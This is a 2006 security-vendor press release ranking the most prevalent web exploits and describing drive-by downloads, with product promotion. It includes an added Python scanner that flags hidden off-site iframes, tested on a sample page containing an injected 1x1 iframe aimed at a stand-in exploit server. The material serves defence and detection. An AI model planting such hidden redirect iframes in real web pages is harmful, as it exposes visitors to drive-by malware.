August 4, 2006; 07:34 AM
Exploit Prevention Labs (http://www.explabs.com), developer of anti-exploit software, today released findings
for its July 2006 Exploit Prevalence Survey™. Now in its third month,
the Exploit Prevalence Survey is the first monthly survey to measure
the top web-borne exploits based on real-world prevalence data. Results
are derived from automated reports submitted by users of Exploit
Prevention Labs’ SocketShield anti-exploit software, combined with
exploit distribution data captured from the company’s popular
LinkScanner service and network of automated hunting-pots.
July’s data shows an increase in the overall prevalence of exploits; of
particular note is the surge in Iframers Launcher Script use, taking it
to the number one position accounting for 26 percent of reported
exploits, up from the number three position in June with 16 percent.
The Iframers Launcher Script is produced and distributed by the St.
Petersburg, Russia-based cyber criminal organization known as the
CoolWebSearch (CWS) gang – the same group responsible for the
still-widespread WMF exploit that first appeared at the end of last
year.
According to Roger Thompson, CTO of Exploit
Prevention Labs and author of the Exploit Prevalence Survey, “Because
our Intelligence Network operates in real-time, we’re able to keep
track of the CWS gang’s activities, unlike the traditional safe surfing
and blacklisting services.”
The WebAttacker launcher
script, developed and sold by an underground software publisher also
based in Russia, remained strong at nearly 26 percent of reported
exploits, dropping slightly from its number one position in June when
it accounted for 32 percent of reports. WebAttacker remains popular
because it enables people with little technical knowledge to create and
distribute exploits using a simple point-and-click interface. Although
the developer issued an updated version of the script in July, most
likely to address bug fixes, it continues to distribute the same suite
of exploits as it did in June.
Incidences of the Windows
Metafile (WMF) exploit, which appeared and spread rapidly at the end of
2005, bounced back up to the number three position with 17 percent
prevalence in July from its number four position and 15 percent in
June.
Thompson urged users to redouble their patching
efforts. “Even though seven months have passed since Microsoft issued a
patch for the WMF vulnerability, WMF’s continued strong showing in our
surveys indicates that a significant number of users remain unpatched.”
The MDAC exploit continued to increase in prevalence, reaching 3.5
percent prevalence in July over 0.5 percent in June, although the
number is likely much higher, since the WebAttacker launcher script
also distributes the MDAC exploit.
Exploit Prevalence Results for the Month of July 2006
The following is a summary of the top five most-reported web exploits for the month of July 2006:
Each entry lists the exploit, its rank last month (June), its percent of overall occurrences in July, and a description.

Exploit: Iframers launcher script
Rank last month: 3
Percent of overall occurrences: 26.11 percent
Description: Propagated by a cybercrime organization sometimes called the CoolWebSearch gang, or the Russian iframers, this exploit is perpetrated by a cybercrime mob generally thought to be based in St. Petersburg, Russia. This organization is responsible for the Circuit City hack in early June 2006. Using a simple HTML tag called an iframe embedded on a hacked web site, the visitor's web browser is redirected to an exploit server operated by the gang, which attempts to deposit up to eight different exploits onto the user's computer.

Exploit: WebAttacker
Rank last month: 1
Percent of overall occurrences: 26.00 percent
Description: WebAttacker is a Russian-built software application, first introduced about 18 months ago, which currently launches four different exploits, including MDAC, a Firefox exploit, CreateTextRange, and an exploit for the Java Virtual Machine. Like a commercial software application, it can be purchased online -- but on underground hacker web sites -- for between $20 and $300, and requires minimal technical sophistication to use. Updated every few months, just like legitimate commercial software, only it is crimeware. Updated in July, most likely for bug fixes.

Exploit: WMF (CVE-2005-2124) with known payload
Rank last month: 4
Percent of overall occurrences: 17.33 percent
Description: Windows Metafile exploit from December 2005. Uses a little-known feature of Windows Metafiles to execute arbitrary code, including malware. The exploit, a genuine zero-day attack, was allegedly purchased for $5,000 from a Russian hacking group. Seven months after Microsoft issued a patch, it's still widely used by cybercriminals.

Exploit: TriMode
Rank last month: 5
Percent of overall occurrences: 11.12 percent
Description: A launcher script discovered by Exploit Prevention Labs on May 23, 2006, TriMode is an encrypted script that attempts to launch three different exploits.

Exploit: CreateTextRange (CVE-2006-1359)
Rank last month: 2
Percent of overall occurrences: 9.02 percent
Description: Released March 2006. This is a buffer overflow attack affecting Internet Explorer that enables the execution of arbitrary code, usually a downloader -- a program whose job is to download and install another program such as a rootkit or a keylogger. Patched in April by Microsoft, this exploit appears to be in decline.
NOTE: Numbers above do not add up to 100 percent, due to the following
less-frequently reported exploits: IE Script Action Overload
(4.57 percent), MDAC (3.51 percent), CHM (1.99 percent) and Javascript window
(0.35 percent).
What are Exploits?
Exploits are malware
applications that take advantage of security vulnerabilities in common
software applications such as Windows operating systems and browsers.
Unlike traditional malware, such as viruses or trojans that are usually
created by thrill-seeking individuals trying to cause chaos, exploits
are part of a growing category of malicious and frequently for-profit
applications used by international criminal cyber gangs.
Zero-day exploits, an especially dangerous form of exploit, are
exploits for which no patches are yet available. Once software
vulnerabilities are discovered, it typically takes the software
developer anywhere from three weeks to six months to develop a patch,
because the patches must be rigorously tested to ensure they don’t
cause other system instabilities. On the other hand, exploit developers
are not bothered by such concepts as quality assurance and application
conflicts, and can release their code very quickly, often the same day
a vulnerability is uncovered.
Most exploit infections
occur by what’s known as a drive-by download, in which malicious code
is force-downloaded onto a user’s computer without their knowledge.
This occurs the moment the user visits a compromised web site, which
may well appear completely innocuous. The payload, usually in the form
of a rootkit, then exposes the user to damage from spyware, keyloggers,
and other crimeware.
Many Internet users mistakenly believe as long
as they’re not visiting pornographic or illegal file sharing sites,
they’re safe from exploits. The truth, however, is that even trusted
web sites cannot always be trusted.
Similar to the business model employed by spammers, the exploit
distributors use a tiered distribution system, usually composed of a
single master exploit server that controls a large network of servers
hosting innocent-seeming web sites that in turn act as lures for
unsuspecting visitors. Exploit Prevention Labs has discovered numerous
exploit distribution networks in which up to 20,000 trusted and
legitimate web sites had been hacked by cyber criminals who were using
those sites to spread exploits.
When a surfer visits one
of the sites, malicious code placed on the site silently connects to an
exploit server operated by the criminals and attempts to deliver the
drive-by download onto the user’s machine. If the web surfer is using
an operating system or browser that is unpatched for the latest
vulnerabilities, their machine is infected.
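The redirect mechanism described above (a hidden iframe injected into a hacked page that silently pulls in content from an exploit server) is something a site owner or incident responder can look for in saved page markup. The following scanner is an added example written for this page; it is not code from Exploit Prevention Labs, SocketShield or LinkScanner. It parses captured HTML, collects every iframe, and flags those that point to a host other than the page's own and are also concealed (1x1 dimensions or hidden via style), since an off-site frame on its own is common in legitimate pages. The sample page, the host name shop.example and the exploit-server.invalid address are constructed for the example.

```python
"""Added example: flag hidden or off-site iframes in a captured HTML page.

Looks for the injected-iframe pattern described in the survey: a tiny or
hidden frame whose src points away from the page's own host. Everything
below (sample markup, host names) is constructed for illustration.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: a legitimate store page with one injected hidden frame.
SAMPLE_PAGE = """<html><body>
<h1>Store front</h1>
<iframe src="/widgets/footer.html" width="600" height="120"></iframe>
<iframe src="http://exploit-server.invalid/in.cgi?id=7" width="1" height="1"
        style="visibility:hidden"></iframe>
</body></html>"""

PAGE_HOST = "shop.example"  # assumed: the host the page was fetched from


class IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> start tag in the document."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            # HTMLParser gives (name, value) pairs; value is None for bare attrs
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def _dimension(attrs, name):
    """Parse a width/height attribute as an integer, or None if absent/unparseable."""
    raw = attrs.get(name, "").strip().lower().rstrip("px")
    try:
        return int(raw)
    except ValueError:
        return None


def _is_tiny(attrs):
    """1x1 (or similarly tiny) frames are invisible to the user."""
    w, h = _dimension(attrs, "width"), _dimension(attrs, "height")
    return (w is not None and w <= 2) or (h is not None and h <= 2)


def _is_hidden(attrs):
    """Inline styles that keep the frame from rendering."""
    style = attrs.get("style", "").replace(" ", "").lower()
    return "visibility:hidden" in style or "display:none" in style


def _is_offsite(src, page_host):
    """True when src has an explicit host that differs from the page's host."""
    host = urlparse(src).hostname
    return host is not None and host.lower() != page_host.lower()


def find_suspicious_iframes(html, page_host):
    """Return [(src, reasons)] for iframes that look like injected redirects.

    A frame is reported only when it is off-site AND concealed; off-site
    alone (ads, embedded players) is too common to be a useful signal.
    """
    parser = IframeCollector()
    parser.feed(html)
    findings = []
    for attrs in parser.iframes:
        src = attrs.get("src", "")
        reasons = []
        if _is_offsite(src, page_host):
            reasons.append("off-site src")
        if _is_tiny(attrs):
            reasons.append("tiny frame")
        if _is_hidden(attrs):
            reasons.append("hidden by style")
        if "off-site src" in reasons and len(reasons) > 1:
            findings.append((src, reasons))
    return findings


if __name__ == "__main__":
    for src, reasons in find_suspicious_iframes(SAMPLE_PAGE, PAGE_HOST):
        print(f"suspicious iframe: {src} ({', '.join(reasons)})")
```

Run against a saved copy of a page (or a crawl of your own site) this reports only the 1x1 hidden frame pointing at the constructed exploit-server host, not the site's own footer frame. The combination rule is deliberate: requiring both an off-site destination and a concealment signal keeps ordinary embedded content out of the findings while still catching the injected redirect the survey describes.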
About SocketShield
SocketShield is the industry’s first reliable solution to protect
Internet users against the growing threat of zero-day and other online
exploits that target vulnerabilities in unpatched Windows applications.
SocketShield provides a critical layer of security that complements the
defenses provided by traditional security solutions. Firewalls cannot
stop exploits, because exploits enter within the trusted communications
stream of the user’s browser connection. Anti-virus and anti-spyware
applications can’t protect against exploits because they must wait for
the malware code to hit the hard disk in order to detect it, and by
that time most exploits have already executed their payload. Patch
management systems can’t distribute a patch until the application
vendor releases it. And patching as a general practice, while critical,
often fails because it relies on users taking action of their own
volition.
Free Trials
Free trial downloads of SocketShield are available from Exploit Prevention Labs’ web site at http://www.explabs.com.
The product supports all 32- and 64-bit versions of Windows and
requires minimal computing resources to operate. At the conclusion of
the trial, users can purchase a license, including a one-year
subscription covering unlimited software updates and online technical
support, for $29.95. Volume discounts are available.
Exploit Prevention Labs also last month introduced LinkScanner, a free
real-time url scanner that tells users whether a site they intend to
visit has been poisoned by an exploit distribution network. LinkScanner
is available at http://linkscanner.explabs.com.
About Exploit Prevention Labs
Founded by information security veterans Bob Bales and Roger Thompson
in 2005, Exploit Prevention Labs develops security software to protect
against Web-based exploits. SocketShield, the company’s flagship
product, provides patent-pending protection against zero-day exploits
during the critical risk window between the announcement of a
vulnerability and the provision of a patch by the vendor. Exploit
Prevention Labs also offers the free LinkScanner url checker, the first
product developed from the company’s SocketShield Software Developers’
Kit (SDK). More information about Exploit Prevention Labs and
SocketShield may be found on the company’s website at http://www.explabs.com .